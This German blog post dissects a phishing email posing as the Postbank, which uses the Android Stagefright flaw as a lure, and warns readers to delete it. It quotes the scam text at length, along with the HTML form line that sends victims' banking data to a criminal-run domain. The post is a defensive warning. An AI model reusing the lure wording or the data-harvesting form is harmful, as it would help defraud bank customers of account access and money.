Stagefright-Virus bedroht ihr Konto

Das Wich­tig­ste vorab: Diese E-Mail kommt nicht von der Post­bank. Es ist Phishing und der Ver­such, ihnen einen Tro­janer un­ter­zu­ju­beln. Löschen sie diese E-Mail! Wenn sie das mir als „ir­gend­einem da­her­ge­lau­fenen Blog­ger“ nicht glauben wollen (was durch­aus ver­nünf­tig ist, denn sie kennen mich nicht und ich kann ein be­lie­biger Voll­idiot sein), über­zeu­gen sie sich davon, indem sie kos­ten­los bei der Post­bank-Hot­line für Sicher­heits­fragen unter der Tele­fon­nummer 0800 1008906 an­ru­fen und dort noch ein­mal nach­fra­gen! Und nach­dem sie dort die Be­stä­ti­gung gehört haben, löschen sie diese Spam! Die Post­bank ver­sen­det solche E-Mails nicht. Kommen sie auf gar keinen Fall auf die Idee, wegen einer E-Mail einer Bank ir­gend­wel­che Da­ten ir­gend­wo ein­zu­ge­ben! Egal, was der Grund dafür sein soll! Es ist eine sehr schlechte Idee, die sie viel Geld kosten kann und ihnen mo­na­te­langen Ärger aller Art ein­brin­gen kann. Und wenn sie schon die Hot­line anrufen, stellen sie dort auch gleich die Frage, warum vor dieser sehr ge­fähr­lichen laufenden Be­trugs­num­mer noch nicht pro­mi­nent auf der Kun­den­web­site der Post­bank ge­warnt wird, denn zur­zeit scheint bei der Post­bank noch nie­mand auf diese nahe­lie­gen­de Idee ge­kom­men zu sein – ob­wohl dort an­sons­ten ge­ra­de­zu vor­bild­lich auf gän­gige Be­trugs­maschen hin­ge­wiesen wird. Eine pro­mi­nent plat­zierte War­nung könnte so viel Schaden ver­hindern und kostet dabei so wenig Auf­wand…

So, jetzt aber…

Es war ja klar, dass die Spammer darauf auf­sprin­gen würden. Wer auch nur eine Spur Ver­ant­wor­tung fühlt, wird aller­dings nie­mals auf die Idee ge­kom­men sein, seine Kon­to­füh­rung mit einem Wischo­fon¹ zu machen – denn in diesen werks­sei­tig funk­tions­li­mi­tier­ten Com­putern für Dumme ver­bin­det sich die Secu­rity-Blau­äu­gig­keit der Neun­ziger Jahre mit der tech­nisch kom­pe­ten­ten or­ga­ni­sier­ten Kri­mi­na­li­tät der Zehner Jahre.

Tja, und wer seine Kon­to­füh­rung nicht mit so einem ge­fähr­lichen Spiel­zeug­te­le­fon macht, der lacht schon beim An­blick des Be­treffs, lehnt sich zurück und hat eine Mög­lich­keit weniger, mit derart plumpen Num­mern über­rum­pelt zu werden.

Diese Spam habe ich üb­ri­gens nicht selbst em­pfangen, sie wurde mir von einem Freund mit Konto bei der Post­bank zu­ge­steckt, der schon wegen des…

Von: „Postbank.de“ <do-not-reply@postbank.de>

…in der Spam an­ge­ge­benen Ab­senders ver­un­sichert war, ob sie nicht echt sein könnte. Ich hoffe, er hat sich jetzt für alle Zei­ten ge­merkt, das der Ab­sen­der einer E-Mail ohne Auf­wand ge­fälscht wer­den kann und somit gar nichts über die Her­kunft einer E-Mail sagt. Was Ban­ken tun können, um solche Ver­un­siche­rungen bei Em­pfän­gern von kri­mi­nellen Phishing-Spams zu ver­hin­dern, habe ich schon vor vier Jahren ge­schrie­ben und werde es hier nicht wie­der­holen. Dass die meis­ten Banken immer noch nichts tun, ist ein Be­leg dafür, dass ihnen ihre Kun­den egal sind und dass sie sich nicht daran stören, wenn Kri­mi­nelle das Geld ihrer Kunden für dicke Autos, Ko­kain und Pro­sti­tu­ier­te aus­ge­ben können. Als Kunde einer sol­chen Bank würde ich die darin aus­ge­drück­te Ver­ach­tung in vollem Um­fang zu­rück­geben und mir einen seri­öse­ren Dienst­leis­ter für meine Geld­sachen suchen.

Sehr geehrte/r Kunde,

Weder kennt diese „Post­bank“ den Namen des Em­pfängers, noch macht sie eine Angabe, auf wel­ches Konto sich diese Mail be­zieht². Spä­tes­tens an dieser Stelle sollte jedem Em­pfänger klar sein, dass es sich um eine Spam han­delt.

Die Postbank Sicherheitszentrale [sic! Deppen Leer Zeichen] warnt vor einer Sicherheitslücke beim Smartphone-Betriebssystem Android von Google. Hacker könnten die Daten einfach per MMS stehlen [sic!] und ihr Handy karpern. Der Virus schleicht sich von alleine in ihr System [sic! Komma fehlt.] ohne dass Sie es bemerken.

Ich gehe darauf inhalt­lich nicht weiter ein, außer viel­leicht diese eine Klei­nig­keit: Es geht bei Stage­fright nicht um „Daten per MMS stehlen“, sondern um „be­lie­bi­gen Code in eine MMS (oder ein ir­gend­wie, zum Bei­spiel bei einem Hang­out, vom Wischo­fon ver­ar­bei­tetes Video) ein­bet­ten und un­be­merkt aus­füh­ren“. Der „Post­bank Sicher­heits­zen­tale“ aus der wir­ren Kopf­welt dieser Spammer scheint das nicht so völ­lig klar zu sein, und offen­bar setzen die Kri­mi­nel­len auch darauf…

Einen ausführlichen Bericht über den Stagefright Virus finden sie auf Hier [sic!]

…dass ihre Opfer mit dem ver­link­ten Ar­tikel auf Zeit Online in­tel­lek­tuell über­for­dert sind. Das sind ja immer­hin Buch­sta­ben, die Text formen, der ge­lesen werden will – und übri­gens recht un­klar ist, da er mut­maß­lich von einem Journa­lis­ten ohne ver­tief­te tech­nische Kennt­nis­se ver­fasst wurde. Eine etwas kla­re­re Dar­le­gung gibt es bei Heise Online.

So schützt die Postbank Sie!

1. Wenn Sie im Besitz einen Android-Handys dann folgen Sie bitte den Anweisungen!

Aha, die „Postbank“ schützt mich, indem ich den An­wei­sungen folge. Viel­leicht soll­ten die „Sicher­heits­ex­per­ten“ dort mal einen Deutsch­ex­per­ten ein­stel­len, damit die For­mu­lie­rungen nicht so mies klingen…

2. Klicken Sie „hier“ oder öffnen Sie die Datei in ihrem E-Mail Anhang!

Ein Klick auf „Click here“ in einer di­gi­tal un­sig­nier­ten Mail eines Un­be­kann­ten ist immer ein ganz be­son­ders großer Bei­trag zur Com­puter­sicher­heit…

3. Füllen Sie alle Daten aus und bestätigen Sie auf „Daten absenden“

Ich denke, die „Post­bank“ will mich schützen. Statt­des­sen soll ich einen Anhang öffnen und aus­füllen. Dieser An­hang ist übri­gens eine HTML-Datei. Wer Inte­resse daran hat: den Quell­text habe ich bei Paste­bin hoch­ge­laden. Das Wich­tigste steht in Zeile 110, ich habe hier mal den in­te­res­san­ten Teil iso­liert:

<form ... action="http://b.adress-datenabgleich.com/postbank_check.php" ...>

Die ein­ge­ge­benen Da­ten gehen nicht an einen Server in der Do­main der Post­bank, sondern über die ob­skure und vor ein paar Tagen ano­nym re­gis­trier­te Domain adress (strich) datenabgleich (punkt) com an einen von Ver­brech­ern kon­trol­lier­ten Server, der zu diesem Zeit­punkt er­freu­licher­weise schon vom Inter­net ge­nom­men wurde. (Ein Dank an den Hoster für die schnelle Reaktion! Aber es kann ja auch nicht jeder so lang­sam wie die Post­bank sein, wenn millio­nen­facher Betrug durch­ge­führt wird…)

Welche Daten das sind? Diese Daten hier:

Wer den Ver­brechern so Zu­griff auf das Post­bank-Konto ge­geben hat und ihnen be­stä­tigt hat, unter welcher Adresse die Spam an­kommt und be­klickt wird, darf sich schon „freuen“:

Der nigel­nagel­neue Trojaner, den ga­ran­tiert noch kein Anti­vi­rus-Schlan­gen­öl kennt, wird gleich hin­ter­her­ge­lie­fert.

Wir senden ihnen umgehend eine E-Mail mit einer Software mit der Sie den Stagefright-Virus entfernen können.

Die aller­dings sehr nahe­lie­gen­de Frage, warum die „Post­bank“ nicht gleich jedem ihrer an­ge­mail­ten Kunden eine E-Mail mit einer der­ar­ti­gen Soft­ware zu­sen­den sollte, die be­ant­wor­tet der freund­liche Phisher und Cracker nicht.

Übri­gens ist „Stage­fright“ kein Virus, außer viel­leicht in einem eher skuril­len Sinn des Wortes. Es ist eine schwere, auf vie­ler­lei Wegen aus­beut­bare Sicher­heits­lücke in Android.

Mit freundlichen Grüßen
Ihre Sabine Heinel
Postbank Newsletter-Redaktion

Wenn das die Freundlichkeit ist, will man den Hass nicht mehr kennenlernen.

¹Wischofon ist mein deutsches Wort für das Reklamewort „smart phone“. Es bezeichnet den Gegenstand nach der Tätigkeit, die am häufigsten auf ihn ausgeführt wird: Wischen mit den Fingern. Ich meine das nicht als Schimpfwort.

²Es ist gar nicht selten, dass jemand mehrere Konten hat.